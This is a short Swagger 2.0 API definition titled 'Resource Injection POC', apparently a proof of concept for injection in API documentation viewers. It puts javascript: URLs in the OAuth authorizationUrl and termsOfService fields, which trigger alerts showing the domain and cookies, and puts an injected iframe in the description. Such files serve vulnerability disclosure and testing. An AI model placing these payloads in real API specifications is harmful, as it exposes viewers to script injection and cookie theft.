swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Resource Injection POC
  description: <h1>Iframe Injection</h1><iframe src="https://www.w3schools.com" title="W3Schools Free Online Web Tutorials"></iframe>
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
